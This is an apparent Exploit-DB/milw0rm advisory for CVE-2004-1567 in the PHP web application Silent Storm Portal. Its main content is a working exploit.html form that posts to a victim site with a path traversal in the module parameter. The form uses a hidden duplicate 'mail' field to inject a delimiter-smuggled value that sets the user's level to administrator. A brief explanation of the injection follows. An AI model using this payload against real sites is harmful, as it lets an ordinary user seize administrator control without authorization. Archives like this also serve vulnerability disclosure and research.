Silent Storm Portal Multiple Vulnerabilities

2004-09-30T00:00:00
ID EDB-ID:565
Type exploitdb
Reporter CHT Security Research
Modified 2004-09-30T00:00:00

Description

Silent Storm Portal Multiple Vulnerabilities. CVE-2004-1567. Webapps exploit for php platform

                                        
                                            Demonstration:

Register a user account then login and run the exploit.html

---exploit.html----
<form method="post" action="http://www.victim.com/index.php?module=../../profile">
<input type="text" name="mail" value="any mail com"><br>
<input type="hidden" name="mail" value="<~>1<~>">
<input type="submit" name="post" value="Get Admin!">
</form>
---/exploit.html---

That's All!
What Happened?
The 3rd line of exploit.html injected Administrator level "1" into the database file.
( 1: Administrator,2: is Normal User. )

# milw0rm.com [2004-09-30]